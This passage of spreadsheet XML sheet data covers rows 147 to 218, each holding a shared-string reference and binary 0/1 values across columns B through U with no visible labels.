        <v>0</v>
      </c>
      <c r="E147" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U147" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="148" spans="1:21" ht="30">
      <c r="A148" s="3" t="s">
        <v>147</v>
      </c>
      <c r="B148" s="1">
        <v>1</v>
      </c>
      <c r="C148" s="14">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U148" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="149" spans="1:21">
      <c r="A149" s="3" t="s">
        <v>148</v>
      </c>
      <c r="B149" s="1">
        <v>1</v>
      </c>
      <c r="C149" s="14">
        <v>0</v>
      </c>
      <c r="D149" s="5">
        <v>0</v>
      </c>
      <c r="E149" s="5">
        <v>0</v>
      </c>
      <c r="F149" s="5">
        <v>1</v>
      </c>
      <c r="G149" s="5">
        <v>0</v>
      </c>
      <c r="H149" s="5">
        <v>1</v>
      </c>
      <c r="I149" s="5">
        <v>0</v>
      </c>
      <c r="J149" s="5">
        <v>0</v>
      </c>
      <c r="K149" s="5">
        <v>0</v>
      </c>
      <c r="L149" s="5">
        <v>0</v>
      </c>
      <c r="M149" s="1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7">
        <v>0</v>
      </c>
      <c r="U149" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="150" spans="1:21" ht="30">
      <c r="A150" s="3" t="s">
        <v>149</v>
      </c>
      <c r="B150" s="1">
        <v>1</v>
      </c>
      <c r="C150" s="14">
        <v>0</v>
      </c>
      <c r="D150" s="5">
        <v>0</v>
      </c>
      <c r="E150" s="5">
        <v>1</v>
      </c>
      <c r="F150" s="5">
        <v>1</v>
      </c>
      <c r="G150" s="5">
        <v>0</v>
      </c>
      <c r="H150" s="5">
        <v>0</v>
      </c>
      <c r="I150" s="5">
        <v>0</v>
      </c>
      <c r="J150" s="5">
        <v>1</v>
      </c>
      <c r="K150" s="5">
        <v>0</v>
      </c>
      <c r="L150" s="5">
        <v>0</v>
      </c>
      <c r="M150" s="1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7">
        <v>0</v>
      </c>
      <c r="U150" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="151" spans="1:21">
      <c r="A151" s="3" t="s">
        <v>150</v>
      </c>
      <c r="B151" s="1">
        <v>1</v>
      </c>
      <c r="C151" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U151" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="152" spans="1:21" ht="45">
      <c r="A152" s="3" t="s">
        <v>151</v>
      </c>
      <c r="B152" s="1">
        <v>0</v>
      </c>
      <c r="C152" s="14">
        <v>0</v>
      </c>
      <c r="D152" s="5">
        <v>0</v>
      </c>
      <c r="E152" s="5">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U152" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="153" spans="1:21">
      <c r="A153" s="3" t="s">
        <v>152</v>
      </c>
      <c r="B153" s="1">
        <v>0</v>
      </c>
      <c r="C153" s="14">
        <v>0</v>
      </c>
      <c r="D153" s="5">
        <v>1</v>
      </c>
      <c r="E153" s="5">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U153" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="154" spans="1:21" ht="30">
      <c r="A154" s="3" t="s">
        <v>153</v>
      </c>
      <c r="B154" s="1">
        <v>1</v>
      </c>
      <c r="C154" s="14">
        <v>0</v>
      </c>
      <c r="D154" s="5">
        <v>0</v>
      </c>
      <c r="E154" s="5">
        <v>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1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7">
        <v>1</v>
      </c>
      <c r="U154" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="155" spans="1:21" ht="30">
      <c r="A155" s="3" t="s">
        <v>154</v>
      </c>
      <c r="B155" s="1">
        <v>1</v>
      </c>
      <c r="C155" s="14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1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7">
        <v>0</v>
      </c>
      <c r="U155" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="156" spans="1:21" ht="30">
      <c r="A156" s="3" t="s">
        <v>155</v>
      </c>
      <c r="B156" s="1">
        <v>1</v>
      </c>
      <c r="C156" s="14">
        <v>1</v>
      </c>
      <c r="D156" s="5">
        <v>0</v>
      </c>
      <c r="E156" s="5">
        <v>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1">
        <v>0</v>
      </c>
      <c r="N156" s="14">
        <v>0</v>
      </c>
      <c r="O156" s="14">
        <v>1</v>
      </c>
      <c r="P156" s="14">
        <v>0</v>
      </c>
      <c r="Q156" s="14">
        <v>0</v>
      </c>
      <c r="R156" s="14">
        <v>0</v>
      </c>
      <c r="S156" s="14">
        <v>0</v>
      </c>
      <c r="T156" s="7">
        <v>0</v>
      </c>
      <c r="U156" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="157" spans="1:21" ht="45">
      <c r="A157" s="3" t="s">
        <v>156</v>
      </c>
      <c r="B157" s="1">
        <v>1</v>
      </c>
      <c r="C157" s="14">
        <v>1</v>
      </c>
      <c r="D157" s="5">
        <v>0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1">
        <v>0</v>
      </c>
      <c r="N157" s="14">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U157" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="158" spans="1:21" ht="30">
      <c r="A158" s="3" t="s">
        <v>157</v>
      </c>
      <c r="B158" s="1">
        <v>1</v>
      </c>
      <c r="C158" s="14">
        <v>0</v>
      </c>
      <c r="D158" s="5">
        <v>0</v>
      </c>
      <c r="E158" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U158" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="159" spans="1:21" ht="30">
      <c r="A159" s="3" t="s">
        <v>158</v>
      </c>
      <c r="B159" s="1">
        <v>1</v>
      </c>
      <c r="C159" s="14">
        <v>0</v>
      </c>
      <c r="D159" s="5">
        <v>0</v>
      </c>
      <c r="E159" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U159" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="160" spans="1:21" ht="90">
      <c r="A160" s="3" t="s">
        <v>159</v>
      </c>
      <c r="B160" s="1">
        <v>0</v>
      </c>
      <c r="C160" s="1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1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U160" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="161" spans="1:21" ht="30">
      <c r="A161" s="3" t="s">
        <v>160</v>
      </c>
      <c r="B161" s="1">
        <v>1</v>
      </c>
      <c r="C161" s="14">
        <v>1</v>
      </c>
      <c r="D161" s="5">
        <v>0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1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1</v>
      </c>
      <c r="S161" s="14">
        <v>0</v>
      </c>
      <c r="T161" s="7">
        <v>0</v>
      </c>
      <c r="U161" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="162" spans="1:21" ht="30">
      <c r="A162" s="3" t="s">
        <v>161</v>
      </c>
      <c r="B162" s="1">
        <v>1</v>
      </c>
      <c r="C162" s="14">
        <v>0</v>
      </c>
      <c r="D162" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U162" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="163" spans="1:21" ht="45">
      <c r="A163" s="3" t="s">
        <v>162</v>
      </c>
      <c r="B163" s="1">
        <v>1</v>
      </c>
      <c r="C163" s="14">
        <v>0</v>
      </c>
      <c r="D163" s="5">
        <v>0</v>
      </c>
      <c r="E163" s="5">
        <v>0</v>
      </c>
      <c r="F163" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U163" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="164" spans="1:21">
      <c r="A164" s="3" t="s">
        <v>163</v>
      </c>
      <c r="B164" s="1">
        <v>0</v>
      </c>
      <c r="C164" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U164" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="165" spans="1:21" ht="30">
      <c r="A165" s="3" t="s">
        <v>164</v>
      </c>
      <c r="B165" s="1">
        <v>1</v>
      </c>
      <c r="C165" s="14">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N165" s="14">
        <v>0</v>
      </c>
      <c r="O165" s="14">
        <v>1</v>
      </c>
      <c r="P165" s="14">
        <v>0</v>
      </c>
      <c r="Q165" s="14">
        <v>0</v>
      </c>
      <c r="R165" s="14">
        <v>0</v>
      </c>
      <c r="S165" s="14">
        <v>0</v>
      </c>
      <c r="T165" s="7">
        <v>0</v>
      </c>
      <c r="U165" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="166" spans="1:21" ht="30">
      <c r="A166" s="3" t="s">
        <v>165</v>
      </c>
      <c r="B166" s="1">
        <v>1</v>
      </c>
      <c r="C166" s="14">
        <v>0</v>
      </c>
      <c r="D166" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U166" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="167" spans="1:21" ht="30">
      <c r="A167" s="3" t="s">
        <v>166</v>
      </c>
      <c r="B167" s="1">
        <v>0</v>
      </c>
      <c r="C167" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U167" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="168" spans="1:21">
      <c r="A168" s="3" t="s">
        <v>167</v>
      </c>
      <c r="B168" s="1">
        <v>1</v>
      </c>
      <c r="C168" s="14">
        <v>0</v>
      </c>
      <c r="D168" s="5">
        <v>0</v>
      </c>
      <c r="E168" s="5">
        <v>0</v>
      </c>
      <c r="F168" s="5">
        <v>1</v>
      </c>
      <c r="G168" s="5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1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7">
        <v>0</v>
      </c>
      <c r="U168" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="169" spans="1:21">
      <c r="A169" s="3" t="s">
        <v>168</v>
      </c>
      <c r="B169" s="1">
        <v>0</v>
      </c>
      <c r="C169" s="14">
        <v>0</v>
      </c>
      <c r="D169" s="5">
        <v>0</v>
      </c>
      <c r="E169" s="5">
        <v>1</v>
      </c>
      <c r="F169" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U169" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="170" spans="1:21" ht="30">
      <c r="A170" s="3" t="s">
        <v>169</v>
      </c>
      <c r="B170" s="1">
        <v>1</v>
      </c>
      <c r="C170" s="14">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U170" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="171" spans="1:21" ht="90">
      <c r="A171" s="3" t="s">
        <v>170</v>
      </c>
      <c r="B171" s="1">
        <v>0</v>
      </c>
      <c r="C171" s="1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1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U171" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="172" spans="1:21">
      <c r="A172" s="3" t="s">
        <v>171</v>
      </c>
      <c r="B172" s="1">
        <v>1</v>
      </c>
      <c r="C172" s="14">
        <v>0</v>
      </c>
      <c r="D172" s="5">
        <v>0</v>
      </c>
      <c r="E172" s="5">
        <v>1</v>
      </c>
      <c r="F172" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U172" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="173" spans="1:21" ht="30">
      <c r="A173" s="3" t="s">
        <v>172</v>
      </c>
      <c r="B173" s="1">
        <v>1</v>
      </c>
      <c r="C173" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U173" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="174" spans="1:21" ht="30">
      <c r="A174" s="3" t="s">
        <v>173</v>
      </c>
      <c r="B174" s="1">
        <v>1</v>
      </c>
      <c r="C174" s="14">
        <v>0</v>
      </c>
      <c r="D174" s="5">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U174" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="175" spans="1:21" ht="60">
      <c r="A175" s="3" t="s">
        <v>174</v>
      </c>
      <c r="B175" s="1">
        <v>0</v>
      </c>
      <c r="C175" s="14">
        <v>0</v>
      </c>
      <c r="D175" s="5">
        <v>0</v>
      </c>
      <c r="E175" s="5">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U175" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="176" spans="1:21" ht="45">
      <c r="A176" s="3" t="s">
        <v>175</v>
      </c>
      <c r="B176" s="1">
        <v>1</v>
      </c>
      <c r="C176" s="14">
        <v>1</v>
      </c>
      <c r="D176" s="5">
        <v>0</v>
      </c>
      <c r="E176" s="5">
        <v>1</v>
      </c>
      <c r="F176" s="5">
        <v>0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1">
        <v>0</v>
      </c>
      <c r="N176" s="14">
        <v>0</v>
      </c>
      <c r="O176" s="14">
        <v>0</v>
      </c>
      <c r="P176" s="14">
        <v>0</v>
      </c>
      <c r="Q176" s="14">
        <v>1</v>
      </c>
      <c r="R176" s="14">
        <v>0</v>
      </c>
      <c r="S176" s="14">
        <v>0</v>
      </c>
      <c r="T176" s="7">
        <v>0</v>
      </c>
      <c r="U176" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="177" spans="1:21" ht="30">
      <c r="A177" s="3" t="s">
        <v>176</v>
      </c>
      <c r="B177" s="1">
        <v>1</v>
      </c>
      <c r="C177" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U177" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="178" spans="1:21" ht="30">
      <c r="A178" s="3" t="s">
        <v>177</v>
      </c>
      <c r="B178" s="1">
        <v>1</v>
      </c>
      <c r="C178" s="14">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U178" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="179" spans="1:21" ht="30">
      <c r="A179" s="3" t="s">
        <v>178</v>
      </c>
      <c r="B179" s="1">
        <v>1</v>
      </c>
      <c r="C179" s="14">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U179" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="180" spans="1:21" ht="45">
      <c r="A180" s="3" t="s">
        <v>179</v>
      </c>
      <c r="B180" s="1">
        <v>1</v>
      </c>
      <c r="C180" s="14">
        <v>1</v>
      </c>
      <c r="D180" s="5">
        <v>0</v>
      </c>
      <c r="E180" s="5">
        <v>1</v>
      </c>
      <c r="F180" s="5">
        <v>0</v>
      </c>
      <c r="G180" s="5">
        <v>0</v>
      </c>
      <c r="H180" s="5">
        <v>1</v>
      </c>
      <c r="I180" s="5">
        <v>0</v>
      </c>
      <c r="J180" s="5">
        <v>0</v>
      </c>
      <c r="K180" s="5">
        <v>0</v>
      </c>
      <c r="L180" s="5">
        <v>0</v>
      </c>
      <c r="M180" s="1">
        <v>0</v>
      </c>
      <c r="N180" s="14">
        <v>0</v>
      </c>
      <c r="O180" s="14">
        <v>0</v>
      </c>
      <c r="P180" s="14">
        <v>0</v>
      </c>
      <c r="Q180" s="14">
        <v>1</v>
      </c>
      <c r="R180" s="14">
        <v>0</v>
      </c>
      <c r="S180" s="14">
        <v>0</v>
      </c>
      <c r="T180" s="7">
        <v>0</v>
      </c>
      <c r="U180" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="181" spans="1:21" ht="30">
      <c r="A181" s="3" t="s">
        <v>180</v>
      </c>
      <c r="B181" s="1">
        <v>1</v>
      </c>
      <c r="C181" s="14">
        <v>0</v>
      </c>
      <c r="D181" s="5">
        <v>0</v>
      </c>
      <c r="E181" s="5">
        <v>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1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7">
        <v>1</v>
      </c>
      <c r="U181" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="182" spans="1:21" ht="30">
      <c r="A182" s="3" t="s">
        <v>181</v>
      </c>
      <c r="B182" s="1">
        <v>0</v>
      </c>
      <c r="C182" s="14">
        <v>0</v>
      </c>
      <c r="D182" s="5">
        <v>0</v>
      </c>
      <c r="E182" s="5">
        <v>0</v>
      </c>
      <c r="F182" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U182" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="183" spans="1:21" ht="30">
      <c r="A183" s="3" t="s">
        <v>182</v>
      </c>
      <c r="B183" s="1">
        <v>1</v>
      </c>
      <c r="C183" s="14">
        <v>0</v>
      </c>
      <c r="D183" s="5">
        <v>0</v>
      </c>
      <c r="E183" s="5">
        <v>0</v>
      </c>
      <c r="F183" s="5">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U183" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="184" spans="1:21">
      <c r="A184" s="3" t="s">
        <v>183</v>
      </c>
      <c r="B184" s="1">
        <v>1</v>
      </c>
      <c r="C184" s="14">
        <v>1</v>
      </c>
      <c r="D184" s="5">
        <v>0</v>
      </c>
      <c r="E184" s="5"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1">
        <v>0</v>
      </c>
      <c r="N184" s="14">
        <v>0</v>
      </c>
      <c r="O184" s="14">
        <v>0</v>
      </c>
      <c r="P184" s="14">
        <v>1</v>
      </c>
      <c r="Q184" s="14">
        <v>0</v>
      </c>
      <c r="R184" s="14">
        <v>0</v>
      </c>
      <c r="S184" s="14">
        <v>0</v>
      </c>
      <c r="T184" s="7">
        <v>0</v>
      </c>
      <c r="U184" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="185" spans="1:21" ht="30">
      <c r="A185" s="3" t="s">
        <v>184</v>
      </c>
      <c r="B185" s="1">
        <v>1</v>
      </c>
      <c r="C185" s="14">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U185" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="186" spans="1:21">
      <c r="A186" s="3" t="s">
        <v>185</v>
      </c>
      <c r="B186" s="1">
        <v>0</v>
      </c>
      <c r="C186" s="14">
        <v>0</v>
      </c>
      <c r="D186" s="5">
        <v>0</v>
      </c>
      <c r="E186" s="5">
        <v>0</v>
      </c>
      <c r="F186" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U186" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="187" spans="1:21" ht="30">
      <c r="A187" s="3" t="s">
        <v>186</v>
      </c>
      <c r="B187" s="1">
        <v>1</v>
      </c>
      <c r="C187" s="14">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U187" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="188" spans="1:21" ht="30">
      <c r="A188" s="3" t="s">
        <v>187</v>
      </c>
      <c r="B188" s="1">
        <v>1</v>
      </c>
      <c r="C188" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U188" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="189" spans="1:21" ht="30">
      <c r="A189" s="3" t="s">
        <v>188</v>
      </c>
      <c r="B189" s="1">
        <v>1</v>
      </c>
      <c r="C189" s="14">
        <v>0</v>
      </c>
      <c r="D189" s="5">
        <v>0</v>
      </c>
      <c r="E189" s="5">
        <v>1</v>
      </c>
      <c r="F189" s="5">
        <v>0</v>
      </c>
      <c r="G189" s="5">
        <v>0</v>
      </c>
      <c r="H189" s="5">
        <v>1</v>
      </c>
      <c r="I189" s="5">
        <v>0</v>
      </c>
      <c r="J189" s="5">
        <v>0</v>
      </c>
      <c r="K189" s="5">
        <v>0</v>
      </c>
      <c r="L189" s="5">
        <v>0</v>
      </c>
      <c r="M189" s="1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7">
        <v>1</v>
      </c>
      <c r="U189" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="190" spans="1:21" ht="30">
      <c r="A190" s="3" t="s">
        <v>189</v>
      </c>
      <c r="B190" s="1">
        <v>1</v>
      </c>
      <c r="C190" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U190" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="191" spans="1:21">
      <c r="A191" s="3" t="s">
        <v>190</v>
      </c>
      <c r="B191" s="1">
        <v>1</v>
      </c>
      <c r="C191" s="14">
        <v>0</v>
      </c>
      <c r="D191" s="5">
        <v>0</v>
      </c>
      <c r="E191" s="5">
        <v>0</v>
      </c>
      <c r="F191" s="5">
        <v>1</v>
      </c>
      <c r="G191" s="5">
        <v>0</v>
      </c>
      <c r="H191" s="5">
        <v>0</v>
      </c>
      <c r="I191" s="5">
        <v>0</v>
      </c>
      <c r="J191" s="5">
        <v>1</v>
      </c>
      <c r="K191" s="5">
        <v>0</v>
      </c>
      <c r="L191" s="5">
        <v>0</v>
      </c>
      <c r="M191" s="1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7">
        <v>0</v>
      </c>
      <c r="U191" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="192" spans="1:21" ht="30">
      <c r="A192" s="3" t="s">
        <v>191</v>
      </c>
      <c r="B192" s="1">
        <v>1</v>
      </c>
      <c r="C192" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U192" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="193" spans="1:21">
      <c r="A193" s="3" t="s">
        <v>192</v>
      </c>
      <c r="B193" s="1">
        <v>1</v>
      </c>
      <c r="C193" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U193" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="194" spans="1:21" ht="30">
      <c r="A194" s="3" t="s">
        <v>193</v>
      </c>
      <c r="B194" s="1">
        <v>0</v>
      </c>
      <c r="C194" s="14">
        <v>0</v>
      </c>
      <c r="D194" s="5">
        <v>0</v>
      </c>
      <c r="E194" s="5">
        <v>0</v>
      </c>
      <c r="F194" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U194" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="195" spans="1:21">
      <c r="A195" s="3" t="s">
        <v>194</v>
      </c>
      <c r="B195" s="1">
        <v>0</v>
      </c>
      <c r="C195" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U195" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="196" spans="1:21">
      <c r="A196" s="3" t="s">
        <v>195</v>
      </c>
      <c r="B196" s="1">
        <v>1</v>
      </c>
      <c r="C196" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U196" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="197" spans="1:21" ht="105">
      <c r="A197" s="3" t="s">
        <v>196</v>
      </c>
      <c r="B197" s="1">
        <v>0</v>
      </c>
      <c r="C197" s="14">
        <v>0</v>
      </c>
      <c r="D197" s="5">
        <v>0</v>
      </c>
      <c r="E197" s="5">
        <v>1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1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U197" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="198" spans="1:21" ht="30">
      <c r="A198" s="3" t="s">
        <v>197</v>
      </c>
      <c r="B198" s="1">
        <v>1</v>
      </c>
      <c r="C198" s="14">
        <v>1</v>
      </c>
      <c r="D198" s="5">
        <v>0</v>
      </c>
      <c r="E198" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U198" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="199" spans="1:21">
      <c r="A199" s="3" t="s">
        <v>198</v>
      </c>
      <c r="B199" s="1">
        <v>1</v>
      </c>
      <c r="C199" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U199" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="200" spans="1:21">
      <c r="A200" s="3" t="s">
        <v>199</v>
      </c>
      <c r="B200" s="1">
        <v>1</v>
      </c>
      <c r="C200" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U200" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="201" spans="1:21" ht="90">
      <c r="A201" s="3" t="s">
        <v>200</v>
      </c>
      <c r="B201" s="1">
        <v>0</v>
      </c>
      <c r="C201" s="1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1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U201" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="202" spans="1:21" ht="30">
      <c r="A202" s="3" t="s">
        <v>201</v>
      </c>
      <c r="B202" s="1">
        <v>1</v>
      </c>
      <c r="C202" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U202" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="203" spans="1:21" ht="30">
      <c r="A203" s="3" t="s">
        <v>202</v>
      </c>
      <c r="B203" s="1">
        <v>1</v>
      </c>
      <c r="C203" s="14">
        <v>0</v>
      </c>
      <c r="D203" s="5">
        <v>0</v>
      </c>
      <c r="E203" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U203" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="204" spans="1:21" ht="30">
      <c r="A204" s="3" t="s">
        <v>203</v>
      </c>
      <c r="B204" s="1">
        <v>0</v>
      </c>
      <c r="C204" s="14">
        <v>0</v>
      </c>
      <c r="D204" s="5">
        <v>0</v>
      </c>
      <c r="E204" s="5">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U204" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="205" spans="1:21">
      <c r="A205" s="3" t="s">
        <v>204</v>
      </c>
      <c r="B205" s="1">
        <v>1</v>
      </c>
      <c r="C205" s="14">
        <v>0</v>
      </c>
      <c r="D205" s="5">
        <v>0</v>
      </c>
      <c r="E205" s="5">
        <v>0</v>
      </c>
      <c r="F205" s="5">
        <v>1</v>
      </c>
      <c r="G205" s="5">
        <v>0</v>
      </c>
      <c r="H205" s="5">
        <v>0</v>
      </c>
      <c r="I205" s="5">
        <v>0</v>
      </c>
      <c r="J205" s="5">
        <v>1</v>
      </c>
      <c r="K205" s="5">
        <v>0</v>
      </c>
      <c r="L205" s="5">
        <v>0</v>
      </c>
      <c r="M205" s="1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7">
        <v>0</v>
      </c>
      <c r="U205" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="206" spans="1:21" ht="60">
      <c r="A206" s="3" t="s">
        <v>205</v>
      </c>
      <c r="B206" s="1">
        <v>1</v>
      </c>
      <c r="C206" s="14">
        <v>1</v>
      </c>
      <c r="D206" s="5">
        <v>0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1">
        <v>0</v>
      </c>
      <c r="N206" s="14">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U206" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="207" spans="1:21" ht="90">
      <c r="A207" s="3" t="s">
        <v>206</v>
      </c>
      <c r="B207" s="1">
        <v>0</v>
      </c>
      <c r="C207" s="1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1</v>
      </c>
      <c r="M207" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U207" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="208" spans="1:21" ht="30">
      <c r="A208" s="3" t="s">
        <v>207</v>
      </c>
      <c r="B208" s="1">
        <v>1</v>
      </c>
      <c r="C208" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U208" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="209" spans="1:21" ht="30">
      <c r="A209" s="3" t="s">
        <v>208</v>
      </c>
      <c r="B209" s="1">
        <v>1</v>
      </c>
      <c r="C209" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U209" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="210" spans="1:21" ht="30">
      <c r="A210" s="3" t="s">
        <v>209</v>
      </c>
      <c r="B210" s="1">
        <v>0</v>
      </c>
      <c r="C210" s="14">
        <v>0</v>
      </c>
      <c r="D210" s="5">
        <v>0</v>
      </c>
      <c r="E210" s="5">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U210" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="211" spans="1:21" ht="30">
      <c r="A211" s="3" t="s">
        <v>210</v>
      </c>
      <c r="B211" s="1">
        <v>1</v>
      </c>
      <c r="C211" s="1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1</v>
      </c>
      <c r="I211" s="5">
        <v>0</v>
      </c>
      <c r="J211" s="5">
        <v>0</v>
      </c>
      <c r="K211" s="5">
        <v>0</v>
      </c>
      <c r="L211" s="5">
        <v>0</v>
      </c>
      <c r="M211" s="1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7">
        <v>0</v>
      </c>
      <c r="U211" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="212" spans="1:21" ht="45">
      <c r="A212" s="3" t="s">
        <v>211</v>
      </c>
      <c r="B212" s="1">
        <v>1</v>
      </c>
      <c r="C212" s="1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1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7">
        <v>1</v>
      </c>
      <c r="U212" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="213" spans="1:21">
      <c r="A213" s="3" t="s">
        <v>212</v>
      </c>
      <c r="B213" s="1">
        <v>1</v>
      </c>
      <c r="C213" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U213" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="214" spans="1:21">
      <c r="A214" s="3" t="s">
        <v>213</v>
      </c>
      <c r="B214" s="1">
        <v>1</v>
      </c>
      <c r="C214" s="14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1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7">
        <v>0</v>
      </c>
      <c r="U214" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="215" spans="1:21">
      <c r="A215" s="3" t="s">
        <v>214</v>
      </c>
      <c r="B215" s="1">
        <v>1</v>
      </c>
      <c r="C215" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U215" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="216" spans="1:21" ht="45">
      <c r="A216" s="3" t="s">
        <v>215</v>
      </c>
      <c r="B216" s="1">
        <v>1</v>
      </c>
      <c r="C216" s="14">
        <v>1</v>
      </c>
      <c r="D216" s="5">
        <v>0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1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1</v>
      </c>
      <c r="T216" s="7">
        <v>0</v>
      </c>
      <c r="U216" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="217" spans="1:21" ht="30">
      <c r="A217" s="3" t="s">
        <v>216</v>
      </c>
      <c r="B217" s="1">
        <v>1</v>
      </c>
      <c r="C217" s="1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1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7">
        <v>0</v>
      </c>
      <c r="U217" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="218" spans="1:21" ht="30">
      <c r="A218" s="3" t="s">
        <v>217</v>
      </c>
      <c r="B218" s="1">
        <v>1</v>
      </c>
      <c r="C218" s="14">
        <v>1</v>
      </c>
      <c r="D218" s="5">
        <v>0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1">
        <v>0</v>
      </c>
      <c r="N218" s="14">
        <v>0</v>
      </c>
      <c r="O218" s="14">
        <v>1</v>
      </c>
      <c r="P218" s="14">
        <v>0</v>
      </c>
      <c r="Q218" s="14">
        <v>0</v>
      </c>
      <c r="R218" s="14">
        <v>0</v>
      </c>
      <c r="S218" s="14">
        <v>0</v>
      </c>
      <c r="T218" s="7">
        <v>0</v>
      </c>
